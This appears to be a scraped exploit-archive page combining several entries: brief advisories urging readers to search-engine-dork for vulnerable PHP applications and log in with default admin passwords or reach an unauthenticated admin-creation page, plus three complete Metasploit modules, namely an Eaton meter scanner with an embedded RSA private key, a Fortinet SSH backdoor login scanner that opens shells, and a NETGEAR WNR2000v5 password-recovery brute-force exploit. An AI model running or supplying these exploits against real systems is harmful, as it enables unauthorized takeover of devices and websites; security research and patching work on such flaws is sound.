Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Loan Management System 2024 1.0 Insecure Settings**

Posted Sep 2, 2024

Authored by indoushka

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4e37e483991ec7b37ab54ed035920c62f7033979ca509714b26270c8fabb131b

Download | Favorite | View

**Loan Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Loan Management System 2024 v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Loan Management System 2024 1.0 Insecure Settings

Eaton Power Xpert Meters running firmware below version 12.x.x.x or below version 13.3.x.x ship with a public/private key pair that facilitate remote administrative access to the devices. Tested on: Firmware 12.1.9.1 and 13.3.2.10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework#### XXX: This shouldn't be necessary but is nowrequire 'net/ssh'require 'net/ssh/command_stream'class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::CommandShell  include Msf::Auxiliary::Report  include Msf::Sessions::CreateSessionOptions  include Msf::Auxiliary::ReportSummary  def initialize(info = {})    super(update_info(info,      'Name'           => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',      'Description'    => %q{        Eaton Power Xpert Meters running firmware below version 12.x.x.x or        below version 13.3.x.x ship with a public/private key pair that        facilitate remote administrative access to the devices.        Tested on: Firmware 12.1.9.1 and 13.3.2.10.      },      'Author'         => [        'BrianWGray'      ],      'References'     => [        ['CVE', '2018-16158'],        ['EDB', '45283'],        ['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],        ['URL', 'https://www.ctrlu.net/vuln/0006.html']      ],      'DisclosureDate' => '2018-07-18',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    # Specified Kex/Encryption downgrade requirements must be set to connect to the Power Meters.    ssh_opts = ssh_client_defaults.merge({      auth_methods:    ['publickey'],      port:            rport,      key_data:        [ key_data ],      hmac:            ['hmac-sha1'],      encryption:      ['aes128-cbc'],      kex:             ['diffie-hellman-group1-sha1'],      host_key:        ['ssh-rsa']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, 'admin', ssh_opts)      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    return unless ssh    print_good("#{ip}:#{rport} - Logged in as admin")    version = ssh.transport.server_version.version    report_vuln(      host: ip,      name: self.name,      refs: self.references,      info: version    )    shell = Net::SSH::CommandStream.new(ssh)    # XXX: Wait for CommandStream to log a channel request failure    sleep 0.1    if (e = shell.error)      print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    info = "#{self.name} (#{version})"    ds_merge = {      'USERNAME' => 'admin'    }    if datastore['CreateSession']      start_session(self, info, ds_merge, false, shell.lsock)    end    # XXX: Ruby segfaults if we don't remove the SSH socket    remove_socket(ssh.transport.socket)  end  def rport    datastore['RPORT']  end  def key_data    <<EOF-----BEGIN RSA PRIVATE KEY-----MIICWwIBAAKBgQCfwugh3Y3mLbxw0q4RZZ5rfK3Qj8t1P81E6sXjhZl7C3FyH4MjC15CEzWovoQpRKrPdDaB5fVyuk6w2fKHrvHLmU2jTzq79B7A4JJEBQatAJeoVDglTyfL+q6BYAtAeNsho8eP/fMwrT2vhylNJ4BTsJbmdDJMoaaHu/0IB9Z9ywIBIwKBgQCEX6plM+qaJeVHif3xKFAP6vZq+s0mopQjKO0bmpUczveZEsu983n8O81f7lA/c2j1CITvSYI6fRyhKZ0RVnCRcaQ8h/grzZNdyyD3FcqDNKO7Xf+bvYySrQXhLeQPI3jXGQPfBZUicGPcJclA98SBdBI1SReAUls1ZdzDwA3T8wJBAM6j1N3tYhdqal2WgA1/WSQrFxTt28mFeUC8enGvKLRm1Nnxk/np9qy2L58BvZzCGyHAsZyVZ7Sqtfb3YzqKMzUCQQDF7GrnrxNXWsIAli/UZscqIovN2ABRa2y8/JYPQAV/KRQ44vet2aaBtrQBK9czk0QLlBfXrKsofBW81+Swiwz/AkEAh8q/FX68zY8Ssod4uGmg+oK3ZYZdO0kVKop8WVXY65QIN3LdlZm/W42qQ+szdaQgdUQc8d6F+mGNhQj4EIaz7wJAYCJfz54t9zq2AEjyqP64gi4JY/szWr8mL+hmJKoRTGRo6G49yXhYMGAOSbY1U5CsBZ+zzyf7XM6ONycIrYVeFQJABB8eqx/R/6Zwi8mVKMAF8lZXZB2dB+UOU12OGgvAHCKh7izYQtGEgPDbklbvEZ31F7H2o337V6FkXQMFyQQdHA==-----END RSA PRIVATE KEY-----EOF  endend

Eaton Xpert Meter SSH Private Key Exposure Scanner

This Metasploit module scans for the Fortinet SSH backdoor.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::CommandShell  include Msf::Sessions::CreateSessionOptions  include Msf::Auxiliary::Report  include Msf::Auxiliary::ReportSummary  def initialize(info = {})    super(update_info(info,      'Name'           => 'Fortinet SSH Backdoor Scanner',      'Description'    => %q{        This module scans for the Fortinet SSH backdoor.      },      'Author'         => [        'operator8203 <operator8203[at]runbox.com>', # PoC        'wvu'                                        # Module      ],      'References'     => [        ['CVE', '2016-1909'],        ['EDB', '39224'],        ['PACKETSTORM', '135225'],        ['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],        ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']      ],      'DisclosureDate' => '2016-01-09',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    factory = ssh_socket_factory    ssh_opts = ssh_client_defaults.merge({      port:            rport,      # The auth method is converted into a class name for instantiation,      # so fortinet-backdoor here becomes FortinetBackdoor from the mixin      auth_methods:    ['fortinet-backdoor']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, 'Fortimanager_Access', ssh_opts)      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    return unless ssh    print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")    version = ssh.transport.server_version.version    report_vuln(      host: ip,      name: self.name,      refs: self.references,      info: version    )    shell = Net::SSH::CommandStream.new(ssh)    # XXX: Wait for CommandStream to log a channel request failure    sleep 0.1    if (e = shell.error)      print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    info = "#{self.name} (#{version})"    ds_merge = {      'USERNAME' => 'Fortimanager_Access'    }    if datastore['CreateSession']      start_session(self, info, ds_merge, false, shell.lsock)    end    # XXX: Ruby segfaults if we don't remove the SSH socket    remove_socket(ssh.transport.socket)  end  def rport    datastore['RPORT']  endend

Fortinet SSH Backdoor Scanner

The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery. This vulnerability can be exploited by an unauthenticated attacker who is able to guess the value of a certain timestamp which is in the configuration of the router. Brute forcing the timestamp token might take a few minutes, a few hours, or days, but it is guaranteed that it can be bruteforced. This Metasploit module works very reliably and it has been tested with the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this has not been tested.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'time'class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::CRand  def initialize(info = {})    super(      update_info(        info,        'Name' => 'NETGEAR WNR2000v5 Administrator Password Recovery',        'Description' => %q{          The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.          This vulnerability can be exploited by an unauthenticated attacker who is able to guess          the value of a certain timestamp which is in the configuration of the router.          Brute forcing the timestamp token might take a few minutes, a few hours, or days, but          it is guaranteed that it can be bruteforced.          This module works very reliably and it has been tested with the WNR2000v5, firmware versions          1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this          has not been tested.        },        'Author' => [          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2016-10175'],          ['CVE', '2016-10176'],          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],          ['URL', 'https://seclists.org/fulldisclosure/2016/Dec/72'],          ['URL', 'https://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']        ],        'DisclosureDate' => '2016-12-20'      )    )    register_options(      [        Opt::RPORT(80)      ]    )    register_advanced_options(      [        OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),        OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting through', 200])      ]    )  end  def get_current_time    res = send_request_cgi({      'uri' => '/',      'method' => 'GET'    })    if res && res['Date']      date = res['Date']      return Time.parse(date).strftime('%s').to_i    end  end  # Do some crazyness to force Ruby to cast to a single-precision float and  # back to an integer.  # This emulates the behaviour of the soft-fp library and the float cast  # which is done at the end of Netgear's timestamp generator.  def ieee754_round(number)    [number].pack('f').unpack('f*')[0].to_i  end  # This is the actual algorithm used in the get_timestamp function in  # the Netgear firmware.  def get_timestamp(time)    srandom_r time    t0 = random_r    t1 = 0x17dc65df    hi = (t0 * t1) >> 32    t2 = t0 >> 31    t3 = hi >> 23    t3 -= t2    t4 = t3 * 0x55d4a80    t0 -= t4    t0 += 0x989680    ieee754_round(t0)  end  def get_creds    res = send_request_cgi({      'uri' => '/BRS_netgear_success.html',      'method' => 'GET'    })    if res && res.body =~ /var sn="(\w*)";/      serial = ::Regexp.last_match(1)    else      fail_with(Failure::Unknown, "#{peer} - Failed to obtain serial number, bailing out...")    end    # 1: send serial number    send_request_cgi({      'uri' => '/apply_noauth.cgi',      'query' => '/unauth.cgi',      'method' => 'POST',      'Content-Type' => 'application/x-www-form-urlencoded',      'vars_post' =>      {        'submit_flag' => 'match_sn',        'serial_num' => serial,        'continue' => '+Continue+'      }    })    # 2: send answer to secret questions    send_request_cgi({      'uri' => '/apply_noauth.cgi',      'query' => '/securityquestions.cgi',      'method' => 'POST',      'Content-Type' => 'application/x-www-form-urlencoded',      'vars_post' =>      {        'submit_flag' => 'security_question',        'answer1' => @q1,        'answer2' => @q2,        'continue' => '+Continue+'      }    })    # 3: PROFIT!!!    res = send_request_cgi({      'uri' => '/passwordrecovered.cgi',      'method' => 'GET'    })    if res && res.body =~ %r{Admin Password: (.*)</TD>}      password = ::Regexp.last_match(1)      if password.blank?        fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")      end    else      fail_with(Failure::Unknown, "#{peer} - Failed to obtain password")    end    if res && res.body =~ %r{Admin Username: (.*)</TD>}      username = ::Regexp.last_match(1)    else      fail_with(Failure::Unknown, "#{peer} - Failed to obtain username")    end    return [username, password]  end  def send_req(timestamp)    query_str = (if timestamp.nil?                   '/PWD_password.htm'                 else                   "/PWD_password.htm%20timestamp=#{timestamp}"                 end)    res = send_request_raw({      'uri' => '/apply_noauth.cgi',      'query' => query_str,      'method' => 'POST',      'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },      'data' => "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=#{@q1}&question2=2&answer2=#{@q2}"    })    return res  rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e    return  end  def run    # generate the security questions    @q1 = Rex::Text.rand_text_alpha(rand(2..21))    @q2 = Rex::Text.rand_text_alpha(rand(2..21))    # let's try without timestamp first (the timestamp only gets set if the user visited the page before)    print_status("#{peer} - Trying the easy way out first")    res = send_req(nil)    if res && res.code == 200      credentials = get_creds      print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")      return    end    # no result? let's just go on and bruteforce the timestamp    print_error("#{peer} - Well that didn't work... let's do it the hard way.")    # get the current date from the router and parse it    end_time = get_current_time    if end_time.nil?      fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")    end    if end_time <= datastore['TIME_OFFSET']      start_time = 0    else      start_time = end_time - datastore['TIME_OFFSET']    end    end_time += datastore['TIME_SURPLUS']    if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i      end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i    end    print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")    print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")    # work back from the current router time minus datastore['TIME_OFFSET']    loop do      for time in end_time.downto(start_time)        timestamp = get_timestamp(time)        sleep 0.1        if time % 400 == 0          print_status("#{peer} - Still working, trying time #{time}")        end        res = send_req(timestamp)        next unless res && res.code == 200        credentials = get_creds        print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")        store_valid_credential(user: credentials[0], private: credentials[1]) # more consistent service_name and protocol, now supplies ip and port        return      end      end_time = start_time      start_time -= datastore['TIME_OFFSET']      if start_time < 0        if end_time <= datastore['TIME_OFFSET']          fail_with(Failure::Unknown, "#{peer} - Exploit failed")        end        start_time = 0      end      print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")      # let the router clear the buffers a bit...      sleep 30    end  endend

NETGEAR WNR2000v5 Administrator Password Recovery

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

Posted Aug 29, 2024

Authored by indoushka

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 0abd7e5d887d9e2204c565886d418ad0656b2616bb80e508761e6e23aa8bf66f

Download | Favorite | View

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : Online Graduate Tracer System V 1.0.0 IDOR Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new admin.[+] use payload : /admin/user_ad.php or /admin/homead.php[+] http://127.0.0.1/tracking/admin/user_ad.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference

Online Appointment System version 1.0 suffers from an ignored default credential vulnerability.

**Online Appointment System 1.0 Insecure Settings**

Posted Aug 29, 2024

Authored by indoushka

Online Appointment System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | d5e851d5d33d2e7f80f5f84bed4e54f5abf704b307cd6b2d6284ec6e7d940a3c

Download | Favorite | View

**Online Appointment System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Online Appointment System v1.0 Insecure Settings Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Online Appointment System 1.0 Insecure Settings

Multi-Vendor Online Groceries Management System version 1.0 suffers from an ignored default credential vulnerability.

**Multi-Vendor Online Groceries Management System 1.0 Insecure Settings**

Posted Aug 29, 2024

Authored by indoushka

Multi-Vendor Online Groceries Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | cd8e33861bcd681954a3b899d067996fd35799bcecc9ac6f0764304867a5ecb8

Download | Favorite | View

**Multi-Vendor Online Groceries Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Multi-Vendor Online Groceries Management System v1.0 Insecure Settings Vulnerability                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Multi-Vendor Online Groceries Management System 1.0 Insecure Settings

MSMS-PHP version 1.0 suffers from an ignored default credential vulnerability.

**MSMS-PHP 1.0 Insecure Settings**

Posted Aug 28, 2024

Authored by indoushka

MSMS-PHP version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit, php

SHA-256 | 901a66e3533b07e82bfa171f76797bfe6f506ccd295fb4c073fbbd2ad85576ea

Download | Favorite | View

**MSMS-PHP 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : MSMS-PHP v1.0 Insecure Settings Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,567)
*   Arbitrary (16,906)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,840)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,123)
*   Encryption (2,389)
*   Exploit (53,308)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,227)
*   Proof of Concept (2,396)
*   Protocol (3,731)
*   Python (1,648)
*   Remote (31,704)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,023)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,919)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,636)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,782)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,677)
*   Other

MSMS-PHP 1.0 Insecure Settings

Laundry Management System version 1.0 suffers from a remote file inclusion vulnerability.

**Laundry Management System 1.0 Remote File Inclusion**

Posted Aug 28, 2024

Authored by indoushka

Laundry Management System version 1.0 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, code execution, file inclusion

SHA-256 | 8fab3cbba3b63d49ce3f1398516dff725855194afb4b9b834d890bf1ab8dff45

Download | Favorite | View

**Laundry Management System 1.0 Remote File Inclusion**

